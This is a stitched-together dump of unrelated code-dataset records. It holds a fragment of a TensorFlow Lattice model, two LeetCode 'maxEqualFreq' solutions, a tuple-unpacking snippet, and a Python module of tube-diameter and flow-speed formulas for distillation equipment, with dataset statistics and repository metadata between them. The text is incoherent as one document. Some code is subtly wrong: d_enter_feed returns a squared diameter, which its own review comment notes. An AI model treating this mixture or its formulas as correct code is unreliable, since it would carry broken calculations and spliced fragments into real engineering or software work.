            units=params.lattice_units,
            monotonicities=[
                'increasing', params.uy_monotonicity, *params.z_monotonicity
            ],
            output_min=0.0,
            output_max=1.0,
            name='Y',
        )([layer_a_z, layer_uy, *layer_z])
        lattice_y_prime = tfl.layers.Lattice(
            lattice_sizes=[2,*lattice_sizes[1:]],
            units=params.lattice_units,
            monotonicities=[
                'increasing', params.uy_monotonicity, *params.z_monotonicity
            ],
            output_min=0.0,
            output_max=1.0,
            name='Y_prime',
        )([layer_a_z_prime, layer_uy, *layer_z])
    # Optional output transform.
    # NOTE(review): only 'sigmoid' also transforms lattice_y_prime — confirm.
    if params.end_activation == 'calib':
        lattice_y = tfl.layers.PWLCalibration(
            input_keypoints=np.linspace(0.0, 1.0, 5),
            name='output_calib',
        )(
            lattice_y)
    elif params.end_activation == 'softmax':
        lattice_y = tf.keras.layers.Softmax()(lattice_y)
    elif params.end_activation == 'sigmoid':
        lattice_y = tf.nn.sigmoid(lattice_y)
        lattice_y_prime = tf.nn.sigmoid(lattice_y_prime)
    model = tf.keras.models.Model(
        inputs=model_inputs,
        outputs=[lattice_y, lattice_y_prime])
    return model
| 40.025501
| 151
| 0.611313
| 2,627
| 21,974
| 4.802817
| 0.054054
| 0.054213
| 0.034002
| 0.035666
| 0.837442
| 0.807086
| 0.786399
| 0.765871
| 0.750733
| 0.732662
| 0
| 0.011691
| 0.28379
| 21,974
| 548
| 152
| 40.09854
| 0.789999
| 0.015928
| 0
| 0.742794
| 0
| 0
| 0.049142
| 0.003332
| 0
| 0
| 0
| 0
| 0
| 1
| 0.015521
| false
| 0
| 0.008869
| 0
| 0.039911
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6bb55cc1a7921e00babc4d3cd09f92cf686695df
| 2,874
|
py
|
Python
|
Python3/1224.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 854
|
2018-11-09T08:06:16.000Z
|
2022-03-31T06:05:53.000Z
|
Python3/1224.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 29
|
2019-06-02T05:02:25.000Z
|
2021-11-15T04:09:37.000Z
|
Python3/1224.py
|
rakhi2001/ecom7
|
73790d44605fbd51e8f7e804b9808e364fcfc680
|
[
"MIT"
] | 347
|
2018-12-23T01:57:37.000Z
|
2022-03-12T14:51:21.000Z
|
__________________________________________________________________________________________________
sample 428 ms submission
# not my submission
class Solution:
    def maxEqualFreq(self, nums: List[int]) -> int:
        """Length of the longest prefix from which removing exactly one
        element leaves every remaining value with the same frequency.

        Scans from the full array backwards, maintaining per-value
        frequencies and a histogram of those frequencies.
        """
        from collections import Counter
        freq = Counter(nums)                 # value -> count within the prefix
        freq_hist = Counter(freq.values())   # count -> how many values have it
        idx = len(nums) - 1

        def drop(count):
            # Remove one reference to `count` from the histogram.
            freq_hist[count] -= 1
            if not freq_hist[count]:
                freq_hist.pop(count)

        while idx > 0:
            distinct = sorted(freq_hist.items())
            if len(distinct) == 2:
                (lo_c, lo_n), (hi_c, hi_n) = distinct
                # One value occurs exactly once more than all the others...
                if hi_c - lo_c == 1 and hi_n == 1:
                    return idx + 1
                # ...or exactly one value occurs exactly once.
                if lo_c == 1 and lo_n == 1:
                    return idx + 1
            elif len(distinct) == 1:
                (only_c, only_n), = distinct
                # Every value occurs once (drop any of them)...
                if only_n > 1 and only_c == 1:
                    return idx + 1
                # ...or a single value repeated (drop one copy).
                if only_c > 1 and only_n == 1:
                    return idx + 1
            # Shrink the prefix by one element from the right.
            freq[nums[idx]] -= 1
            if not freq[nums[idx]]:
                freq.pop(nums[idx])
                drop(1)
            else:
                drop(freq[nums[idx]] + 1)
                freq_hist[freq[nums[idx]]] += 1
            idx -= 1
        return 2
__________________________________________________________________________________________________
sample 452 ms submission
class Solution:
    def maxEqualFreq(self, nums: List[int]) -> int:
        """Longest prefix that becomes uniform in frequency after deleting
        exactly one element. Walks backwards from the full array, keeping a
        value->count map and a count->#values histogram.
        """
        from collections import Counter
        occurrences = Counter(nums)
        per_count = Counter(occurrences.values())
        pos = len(nums) - 1

        def forget(c):
            per_count[c] -= 1
            if per_count[c] == 0:
                del per_count[c]

        while pos > 0:
            if len(per_count) == 2:
                (small, small_refs), (big, big_refs) = sorted(per_count.items())
                if big - small == 1 and big_refs == 1:
                    return pos + 1  # e.g. [1,1,2,2,3,3,3]: drop one 3
                if small == 1 and small_refs == 1:
                    return pos + 1  # e.g. [2,2,3,3,4]: drop the 4
            elif len(per_count) == 1:
                ((c, refs),) = per_count.items()
                if (refs > 1 and c == 1) or (c > 1 and refs == 1):
                    return pos + 1  # example: [1,2,3,4,5] or [1,1,1,1,1]
            # Peel the last element off the prefix.
            last = nums[pos]
            occurrences[last] -= 1
            if occurrences[last] == 0:
                del occurrences[last]
                forget(1)
            else:
                forget(occurrences[last] + 1)
                per_count[occurrences[last]] += 1
            pos -= 1
        return 2
__________________________________________________________________________________________________
| 35.04878
| 102
| 0.564718
| 333
| 2,874
| 3.972973
| 0.138138
| 0.024187
| 0.078609
| 0.084656
| 0.966742
| 0.966742
| 0.954649
| 0.954649
| 0.954649
| 0.954649
| 0
| 0.074447
| 0.308281
| 2,874
| 81
| 103
| 35.481481
| 0.591046
| 0.020529
| 0
| 0.859155
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.028169
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
6bd461c56b668270c1602a79e60ce5abdbcbdee8
| 67
|
py
|
Python
|
examples/unpack_ex.py
|
igfish/toyvm
|
bb1ab371a8c71ba01522556235fc9f017c9b6b8f
|
[
"MIT"
] | null | null | null |
examples/unpack_ex.py
|
igfish/toyvm
|
bb1ab371a8c71ba01522556235fc9f017c9b6b8f
|
[
"MIT"
] | null | null | null |
examples/unpack_ex.py
|
igfish/toyvm
|
bb1ab371a8c71ba01522556235fc9f017c9b6b8f
|
[
"MIT"
] | null | null | null |
# Demonstrate extended iterable unpacking (PEP 3132): the starred target
# absorbs whatever the fixed names on either side leave over, as a list.
values = (1, 2, 3, 4, 5, 6, 7, 8)
a, b, c, *d, e, f = values
print(a, b, c, d, e, f)
| 22.333333
| 42
| 0.373134
| 21
| 67
| 1.190476
| 0.714286
| 0.16
| 0.24
| 0.32
| 0.48
| 0.48
| 0
| 0
| 0
| 0
| 0
| 0.173913
| 0.313433
| 67
| 2
| 43
| 33.5
| 0.369565
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 0.5
| 1
| 0
| 1
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 8
|
d418dbac179023727f5b84c1880156bd5544b034
| 25,776
|
py
|
Python
|
src/rectification/equations/Diameters_tubes.py
|
alex-s-v/pact-rectification
|
0d9ff499ce78489aa6a213936d5097130341a781
|
[
"MIT"
] | 1
|
2020-01-30T21:19:51.000Z
|
2020-01-30T21:19:51.000Z
|
src/rectification/equations/Diameters_tubes.py
|
alex-s-v/pact-rectification
|
0d9ff499ce78489aa6a213936d5097130341a781
|
[
"MIT"
] | null | null | null |
src/rectification/equations/Diameters_tubes.py
|
alex-s-v/pact-rectification
|
0d9ff499ce78489aa6a213936d5097130341a781
|
[
"MIT"
] | 1
|
2020-01-21T20:26:56.000Z
|
2020-01-21T20:26:56.000Z
|
from rectification.utils import unitcheck
@unitcheck(F_mass="kg/s", rho_F_20="kg/m**3", w_liq="m/s", res_unit="m")
def d_enter_feed(F_mass, rho_F_20, w_liq):
    """
    Calculates the tube's diameter of enter to the heat exchanger of Feed.

    Parameters
    ----------
    F_mass : float
        The mass flow rate of feed [kg/s]
    rho_F_20 : float
        The density of feed at 20 degrees, [kg/m**3]
    w_liq : float
        The speed of liquid at the tube, [m/s]

    Returns
    -------
    d_enter_feed : float
        The tube's diameter of enter to the heat exchanger of Feed, [m]

    References
    ----------
    &&&
    """
    # 0.785 ~= pi/4: round-tube cross-section area is 0.785 * d**2.
    # BUGFIX: was "0,785", which made the divisor a tuple (TypeError).
    # NOTE(review): F/(0.785*rho*w) is d**2, not d — the inverse functions in
    # this module use d**2, so a sqrt is likely missing here; confirm against
    # the design calculation before relying on the result.
    return F_mass / (0.785 * rho_F_20 * w_liq)
@unitcheck(F_mass="kg/s", rho_F_20="kg/m**3", d_enter_feed_real="m", res_unit="m/s")
def w_liq_real_enter_feed(F_mass, d_enter_feed_real, rho_F_20):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    F_mass : float
        The mass flow rate of feed [kg/s]
    rho_F_20 : float
        The density of feed at 20 degrees, [kg/m**3]
    d_enter_feed_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_liq_real_enter_feed : float
        The real speed of liquid at the tube, [m/s]

    References
    ----------
    &&&
    """
    # w = F / (rho * A) with A = 0.785 * d**2 (0.785 ~= pi/4).
    # BUGFIX: was "d ^ 2" (bitwise XOR — TypeError on floats) and "0,785"
    # (a tuple) — both made the formula unevaluable.
    return F_mass / ((d_enter_feed_real ** 2) * rho_F_20 * 0.785)
@unitcheck(F_mass="kg/s", rho_F_tboil="kg/m**3", w_liq="m/s", res_unit="m")
def d_enter_feed_column(F_mass, rho_F_tboil, w_liq):
    """
    Calculates the tube's diameter of enter to the column at the feed plate.

    Parameters
    ----------
    F_mass : float
        The mass flow rate of feed, [kg/s]
    rho_F_tboil : float
        The density of feed at the temperature of feed boiling, [kg/m**3]
    w_liq : float
        The speed of liquid at the tube, [m/s]

    Returns
    -------
    d_enter_feed_column : float
        The tube's diameter of enter to the column at the feed plate, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); 0.785 ~= pi/4.  Original `0,785` was a
    # tuple (TypeError) and the square root was missing (units would be m**2).
    return (F_mass / (0.785 * rho_F_tboil * w_liq)) ** 0.5
@unitcheck(F_mass="kg/s", rho_F_tboil="kg/m**3", d_enter_feed_column_real="m", res_unit="m/s")
def w_liq_real_feed_column(F_mass, d_enter_feed_column_real, rho_F_tboil):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    F_mass : float
        The mass flow rate of feed, [kg/s]
    rho_F_tboil : float
        The density of feed at the temperature of feed boiling, [kg/m**3]
    d_enter_feed_column_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_liq_real_enter_feed_column : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return F_mass / (0.785 * d_enter_feed_column_real ** 2 * rho_F_tboil)
@unitcheck(G_mass="kg/s", rho_P_vapor="kg/m**3", w_vapor="m/s", res_unit="m")
def d_out_dist(G_mass, rho_P_vapor, w_vapor):
    """
    Calculates the tube's diameter of out vapor distillate from column to dephlegmator.

    Parameters
    ----------
    G_mass : float
        The mass flow rate of vapor, [kg/s]
    rho_P_vapor : float
        The density of distillate vapor at boiling temperature, [kg/m**3]
    w_vapor : float
        The speed of vapor at the tube, [m/s]

    Returns
    -------
    d_out_dist : float
        The tube's diameter of out vapor distillate from column to dephlegmator, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes the tuple-forming `0,785` and the
    # missing square root (res_unit is "m", not "m**2").
    return (G_mass / (0.785 * rho_P_vapor * w_vapor)) ** 0.5
@unitcheck(G_mass="kg/s", rho_P_vapor="kg/m**3", d_out_dist_real="m", res_unit="m/s")
def w_vapor_real_out_dist(G_mass, d_out_dist_real, rho_P_vapor):
    """
    Calculates the real speed of vapor at the tube.

    Parameters
    ----------
    G_mass : float
        The mass flow rate of vapor, [kg/s]
    rho_P_vapor : float
        The density of distillate vapor at boiling temperature, [kg/m**3]
    d_out_dist_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_vapor_real_out_dist : float
        The real speed of vapor at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return G_mass / (0.785 * d_out_dist_real ** 2 * rho_P_vapor)
@unitcheck(Reflux_mass="kg/s", rho_P_liq="kg/m**3", w_liq="m/s", res_unit="m")
def d_enter_reflux(Reflux_mass, rho_P_liq, w_liq):
    """
    Calculates the tube's diameter of enter reflux to the column.

    Parameters
    ----------
    Reflux_mass : float
        The mass flow rate of reflux, [kg/s]
    rho_P_liq : float
        The density of distillate liquid at boiling temperature, [kg/m**3]
    w_liq : float
        The speed of liquid at the tube, [m/s]

    Returns
    -------
    d_enter_reflux : float
        The tube's diameter of enter reflux to the column, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (Reflux_mass / (0.785 * rho_P_liq * w_liq)) ** 0.5
@unitcheck(Reflux_mass="kg/s", rho_P_liq="kg/m**3", d_enter_reflux_real="m", res_unit="m/s")
def w_enter_reflux_real(Reflux_mass, rho_P_liq, d_enter_reflux_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    Reflux_mass : float
        The mass flow rate of reflux, [kg/s]
    rho_P_liq : float
        The density of distillate liquid at boiling temperature, [kg/m**3]
    d_enter_reflux_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_enter_reflux_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # Fixes: decorator kwarg typo `rrho_P_liq` (unit check was silently not
    # applied to the density argument), `^` -> `**`, tuple `0,785` -> 0.785.
    return Reflux_mass / (0.785 * d_enter_reflux_real ** 2 * rho_P_liq)
@unitcheck(W_mass="kg/s", rho_W_liq="kg/m**3", w_liq_drift="m/s", res_unit="m")
def d_enter_waste_boiler(W_mass, rho_W_liq, w_liq_drift):
    """
    Calculates the tube's diameter of enter waste to boiler from column.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_W_liq : float
        The density of waste liquid at boiling temperature, [kg/m**3]
    w_liq_drift : float
        The drift speed of liquid at the tube, [m/s]

    Returns
    -------
    d_enter_waste_boiler : float
        The tube's diameter of enter waste to boiler from column, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (W_mass / (0.785 * rho_W_liq * w_liq_drift)) ** 0.5
@unitcheck(W_mass="kg/s", rho_W_liq="kg/m**3", d_enter_waste_boiler_real="m", res_unit="m/s")
def w_enter_waste_boiler_real(W_mass, rho_W_liq, d_enter_waste_boiler_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_W_liq : float
        The density of waste liquid at boiling temperature, [kg/m**3]
    d_enter_waste_boiler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_enter_waste_boiler_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return W_mass / (0.785 * d_enter_waste_boiler_real ** 2 * rho_W_liq)
@unitcheck(W_mass="kg/s", rho_W_vapor="kg/m**3", w_vapor="m/s", res_unit="m")
def d_out_waste_boiler(W_mass, rho_W_vapor, w_vapor):
    """
    Calculates the tube's diameter of out waste vapor to column from boiler.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_W_vapor : float
        The density of waste vapor at boiling temperature, [kg/m**3]
    w_vapor : float
        The speed of vapor at the tube, [m/s]

    Returns
    -------
    d_out_waste_boiler : float
        The tube's diameter of out waste vapor to column from boiler, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (W_mass / (0.785 * rho_W_vapor * w_vapor)) ** 0.5
@unitcheck(W_mass="kg/s", rho_W_vapor="kg/m**3", d_out_waste_boiler_real="m", res_unit="m/s")
def w_out_waste_boiler_real(W_mass, rho_W_vapor, d_out_waste_boiler_real):
    """
    Calculates the real speed of vapor at the tube.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_W_vapor : float
        The density of waste vapor at boiling temperature, [kg/m**3]
    d_out_waste_boiler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_out_waste_boiler_real : float
        The real speed of vapor at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return W_mass / (0.785 * d_out_waste_boiler_real ** 2 * rho_W_vapor)
@unitcheck(m_steam_boil="kg/s", rho_steam="kg/m**3", w_vapor="m/s", res_unit="m")
def d_enter_steam_boiler(m_steam_boil, rho_steam, w_vapor):
    """
    Calculates the tube's diameter of enter steam to boiler.

    Parameters
    ----------
    m_steam_boil : float
        The mass flow rate of steam, [kg/s]
    rho_steam : float
        The density of steam at boiling temperature, [kg/m**3]
    w_vapor : float
        The speed of steam at the tube, [m/s]

    Returns
    -------
    d_enter_steam_boiler : float
        The tube's diameter of enter steam to boiler, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (m_steam_boil / (0.785 * rho_steam * w_vapor)) ** 0.5
@unitcheck(m_steam_boil="kg/s", rho_steam_vapor="kg/m**3", d_enter_steam_boiler_real="m", res_unit="m/s")
def w_enter_steam_boiler_real(m_steam_boil, rho_steam_vapor, d_enter_steam_boiler_real):
    """
    Calculates the real speed of vapor at the tube.

    Parameters
    ----------
    m_steam_boil : float
        The mass flow rate of steam, [kg/s]
    rho_steam_vapor : float
        The density of steam vapor at boiling temperature, [kg/m**3]
    d_enter_steam_boiler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_enter_steam_boiler_real : float
        The real speed of vapor at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return m_steam_boil / (0.785 * d_enter_steam_boiler_real ** 2 * rho_steam_vapor)
@unitcheck(m_steam_boil="kg/s", rho_water_liq="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_cond_boiler(m_steam_boil, rho_water_liq, w_drift):
    """
    Calculates the tube's diameter of out condensate from boiler.

    Parameters
    ----------
    m_steam_boil : float
        The mass flow rate of steam, [kg/s]
    rho_water_liq : float
        The density of liquid water at boiling temperature, [kg/m**3]
    w_drift : float
        The drift speed of condensate at the tube, [m/s]

    Returns
    -------
    d_out_cond_boiler : float
        The tube's diameter of out condensate from boiler, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (m_steam_boil / (0.785 * rho_water_liq * w_drift)) ** 0.5
@unitcheck(m_steam_boil="kg/s", rho_water_liq="kg/m**3", d_out_cond_boiler_real="m", res_unit="m/s")
def w_out_cond_boiler_real(m_steam_boil, rho_water_liq, d_out_cond_boiler_real):
    """
    Calculates the real speed of condensate at the tube.

    Parameters
    ----------
    m_steam_boil : float
        The mass flow rate of steam, [kg/s]
    rho_water_liq : float
        The density of liquid water at boiling temperature, [kg/m**3]
    d_out_cond_boiler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_out_cond_boiler_real : float
        The real speed of condensate at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return m_steam_boil / (0.785 * d_out_cond_boiler_real ** 2 * rho_water_liq)
@unitcheck(m_steam_feed="kg/s", rho_steam="kg/m**3", w_vapor="m/s", res_unit="m")
def d_enter_steam_feed(m_steam_feed, rho_steam, w_vapor):
    """
    Calculates the tube's diameter of enter steam to feed heat exchanger.

    Parameters
    ----------
    m_steam_feed : float
        The mass flow rate of steam, [kg/s]
    rho_steam : float
        The density of steam at boiling temperature, [kg/m**3]
    w_vapor : float
        The speed of steam at the tube, [m/s]

    Returns
    -------
    d_enter_steam_feed : float
        The tube's diameter of enter steam to feed heat exchanger, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (m_steam_feed / (0.785 * rho_steam * w_vapor)) ** 0.5
@unitcheck(m_steam_feed="kg/s", rho_steam_vapor="kg/m**3", d_enter_steam_feed_real="m", res_unit="m/s")
def w_enter_steam_feed_real(m_steam_feed, rho_steam_vapor, d_enter_steam_feed_real):
    """
    Calculates the real speed of vapor at the tube.

    Parameters
    ----------
    m_steam_feed : float
        The mass flow rate of steam, [kg/s]
    rho_steam_vapor : float
        The density of steam vapor at boiling temperature, [kg/m**3]
    d_enter_steam_feed_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_enter_steam_feed_real : float
        The real speed of vapor at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return m_steam_feed / (0.785 * d_enter_steam_feed_real ** 2 * rho_steam_vapor)
@unitcheck(m_steam_feed="kg/s", rho_water_liq="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_cond_feed(m_steam_feed, rho_water_liq, w_drift):
    """
    Calculates the tube's diameter of out condensate from feed heat exchanger.

    Parameters
    ----------
    m_steam_feed : float
        The mass flow rate of steam, [kg/s]
    rho_water_liq : float
        The density of liquid water at boiling temperature, [kg/m**3]
    w_drift : float
        The drift speed of condensate at the tube, [m/s]

    Returns
    -------
    d_out_cond_feed : float
        The tube's diameter of out condensate from feed heat exchanger, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (m_steam_feed / (0.785 * rho_water_liq * w_drift)) ** 0.5
@unitcheck(m_steam_feed="kg/s", rho_water_liq="kg/m**3", d_out_cond_feed_real="m", res_unit="m/s")
def w_out_cond_feed_real(m_steam_feed, rho_water_liq, d_out_cond_feed_real):
    """
    Calculates the real speed of condensate at the tube.

    Parameters
    ----------
    m_steam_feed : float
        The mass flow rate of steam, [kg/s]
    rho_water_liq : float
        The density of liquid water at boiling temperature, [kg/m**3]
    d_out_cond_feed_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_out_cond_feed_real : float
        The real speed of condensate at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return m_steam_feed / (0.785 * d_out_cond_feed_real ** 2 * rho_water_liq)
@unitcheck(G_mass="kg/s", rho_dist="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_cond_deph(G_mass, rho_dist, w_drift):
    """
    Calculates the tube's diameter of out distillate from dephlegmator.

    Parameters
    ----------
    G_mass : float
        The mass flow rate of distillate, [kg/s]
    rho_dist : float
        The density of distillate at boiling temperature, [kg/m**3]
    w_drift : float
        The drift speed of condensate at the tube, [m/s]

    Returns
    -------
    d_out_cond_deph : float
        The tube's diameter of out distillate from dephlegmator, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (G_mass / (0.785 * rho_dist * w_drift)) ** 0.5
@unitcheck(G_mass="kg/s", rho_dist="kg/m**3", d_out_deph_real="m", res_unit="m/s")
def w_out_deph_real(G_mass, rho_dist, d_out_deph_real):
    """
    Calculates the real speed of condensate at the tube.

    Parameters
    ----------
    G_mass : float
        The mass flow rate of distillate, [kg/s]
    rho_dist : float
        The density of distillate at boiling temperature, [kg/m**3]
    d_out_deph_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_out_deph_real : float
        The real speed of condensate at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return G_mass / (0.785 * d_out_deph_real ** 2 * rho_dist)
@unitcheck(P_mass="kg/s", rho_dist="kg/m**3", w_drift="m/s", res_unit="m")
def d_enter_dist_cooler(P_mass, rho_dist, w_drift):
    """
    Calculates the tube's diameter of enter distillate to distillate cooler.

    Parameters
    ----------
    P_mass : float
        The mass flow rate of distillate, [kg/s]
    rho_dist : float
        The density of distillate at boiling temperature, [kg/m**3]
    w_drift : float
        The drift speed of liquid at the tube, [m/s]

    Returns
    -------
    d_enter_dist_cooler : float
        The tube's diameter of enter distillate to distillate cooler, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (P_mass / (0.785 * rho_dist * w_drift)) ** 0.5
@unitcheck(P_mass="kg/s", rho_dist="kg/m**3", d_enter_dist_cooler_real="m", res_unit="m/s")
def w_enter_dist_cooler_real(P_mass, rho_dist, d_enter_dist_cooler_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    P_mass : float
        The mass flow rate of distillate, [kg/s]
    rho_dist : float
        The density of distillate at boiling temperature, [kg/m**3]
    d_enter_dist_cooler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_enter_dist_cooler_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return P_mass / (0.785 * d_enter_dist_cooler_real ** 2 * rho_dist)
@unitcheck(P_mass="kg/s", rho_dist_cool="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_dist_cooler(P_mass, rho_dist_cool, w_drift):
    """
    Calculates the tube's diameter of out distillate from distillate cooler to distillate volume.

    Parameters
    ----------
    P_mass : float
        The mass flow rate of distillate, [kg/s]
    rho_dist_cool : float
        The density of distillate at cooling temperature, [kg/m**3]
    w_drift : float
        The drift speed of liquid at the tube, [m/s]

    Returns
    -------
    d_out_dist_cooler : float
        The tube's diameter of out distillate from distillate cooler to distillate volume, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (P_mass / (0.785 * rho_dist_cool * w_drift)) ** 0.5
@unitcheck(P_mass="kg/s", rho_dist_cool="kg/m**3", d_out_dist_cooler_real="m", res_unit="m/s")
def w_out_dist_cooler_real(P_mass, rho_dist_cool, d_out_dist_cooler_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    P_mass : float
        The mass flow rate of distillate, [kg/s]
    rho_dist_cool : float
        The density of distillate at cooling temperature, [kg/m**3]
    d_out_dist_cooler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_out_dist_cooler_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return P_mass / (0.785 * d_out_dist_cooler_real ** 2 * rho_dist_cool)
@unitcheck(W_mass="kg/s", rho_waste="kg/m**3", w_drift="m/s", res_unit="m")
def d_enter_waste_cooler(W_mass, rho_waste, w_drift):
    """
    Calculates the tube's diameter of enter waste to waste cooler.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_waste : float
        The density of waste at boiling temperature, [kg/m**3]
    w_drift : float
        The drift speed of liquid at the tube, [m/s]

    Returns
    -------
    d_enter_waste_cooler : float
        The tube's diameter of enter waste to waste cooler, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (W_mass / (0.785 * rho_waste * w_drift)) ** 0.5
@unitcheck(W_mass="kg/s", rho_waste="kg/m**3", d_enter_waste_cooler_real="m", res_unit="m/s")
def w_enter_waste_cooler_real(W_mass, rho_waste, d_enter_waste_cooler_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_waste : float
        The density of waste at boiling temperature, [kg/m**3]
    d_enter_waste_cooler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_enter_waste_cooler_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return W_mass / (0.785 * d_enter_waste_cooler_real ** 2 * rho_waste)
@unitcheck(W_mass="kg/s", rho_waste_cool="kg/m**3", w_drift="m/s", res_unit="m")
def d_out_waste_cooler(W_mass, rho_waste_cool, w_drift):
    """
    Calculates the tube's diameter of out waste from waste cooler to waste volume.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_waste_cool : float
        The density of waste at cooling temperature, [kg/m**3]
    w_drift : float
        The drift speed of liquid at the tube, [m/s]

    Returns
    -------
    d_out_waste_cooler : float
        The tube's diameter of out waste from waste cooler to waste volume, [m]
    """
    # d = sqrt(G / (0.785*rho*w)); fixes tuple `0,785` and missing sqrt.
    return (W_mass / (0.785 * rho_waste_cool * w_drift)) ** 0.5
@unitcheck(W_mass="kg/s", rho_waste_cool="kg/m**3", d_out_waste_cooler_real="m", res_unit="m/s")
def w_out_waste_cooler_real(W_mass, rho_waste_cool, d_out_waste_cooler_real):
    """
    Calculates the real speed of liquid at the tube.

    Parameters
    ----------
    W_mass : float
        The mass flow rate of waste, [kg/s]
    rho_waste_cool : float
        The density of waste at cooling temperature, [kg/m**3]
    d_out_waste_cooler_real : float
        The real tube's diameter, [m]

    Returns
    -------
    w_out_waste_cooler_real : float
        The real speed of liquid at the tube, [m/s]
    """
    # w = G / (0.785 * d**2 * rho); `^` -> `**`, tuple `0,785` -> 0.785.
    return W_mass / (0.785 * d_out_waste_cooler_real ** 2 * rho_waste_cool)
